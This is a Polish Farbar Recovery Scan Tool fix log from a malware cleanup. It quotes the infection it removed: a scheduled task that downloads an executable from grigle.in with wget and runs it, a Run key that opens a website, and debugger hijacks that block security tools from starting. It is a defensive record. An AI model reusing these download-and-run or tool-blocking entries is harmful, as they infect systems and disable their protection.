Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja:15-09-2015 Uruchomiony przez Kratos (2015-09-17 15:37:42) Run:1 Uruchomiony z C:\Users\Kratos\Desktop Załadowane profile: Kratos (Dostępne profile: Kratos) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** Task: {CDC3B8E6-C4FD-423A-9A92-05B6DA558A79} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grigle.in/ind....exe;1432893265& start cmd /R dat.bmp <==== UWAGA HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [CMD] => cmd.exe /c start http://gangnamgame.org&& exit IFEO\adwcleaner_5.005.exe: [Debugger] svchost.exe IFEO\AnVir.exe: [Debugger] svchost.exe IFEO\AutoLogger.exe: [Debugger] svchost.exe IFEO\avz.exe: [Debugger] svchost.exe IFEO\CCleaner.exe: [Debugger] svchost.exe IFEO\CCleaner64.exe: [Debugger] svchost.exe IFEO\FRST.exe: [Debugger] svchost.exe IFEO\FRST64.exe: [Debugger] svchost.exe IFEO\HiJackThis.exe: [Debugger] svchost.exe IFEO\mbam.exe: [Debugger] svchost.exe IFEO\regedit.exe: [Debugger] svchost.exe IFEO\RegWorks.exe: [Debugger] svchost.exe IFEO\RSIT.exe: [Debugger] svchost.exe IFEO\RSITx64.exe: [Debugger] svchost.exe Reg: reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> Brak pliku EmptyTemp: ***************** "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CDC3B8E6-C4FD-423A-9A92-05B6DA558A79}" => klucz pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDC3B8E6-C4FD-423A-9A92-05B6DA558A79}" => klucz pomyślnie usunięto C:\Windows\System32\Tasks\SYSTEM => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => klucz pomyślnie usunięto HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\CMD => Wartość pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\adwcleaner_5.005.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AnVir.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\AutoLogger.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\avz.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CCleaner.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\CCleaner64.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FRST.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\FRST64.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\HiJackThis.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\mbam.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\regedit.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\RegWorks.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\RSIT.exe" => klucz pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\RSITx64.exe" => klucz pomyślnie usunięto ========= reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes" /f ========= Operacja ukoäczona pomy˜lnie. ========= Koniec Reg: ========= ========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f ========= Operacja ukoäczona pomy˜lnie. ========= Koniec Reg: ========= ========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f ========= Operacja ukoäczona pomy˜lnie. ========= Koniec Reg: ========= "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => klucz pomyślnie usunięto "HKCR\Wow6432Node\CLSID\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => klucz pomyślnie usunięto EmptyTemp: => 384.7 MB danych tymczasowych Usunięto. System wymagał restartu.. ==== Koniec Fixlog 15:37:49 ====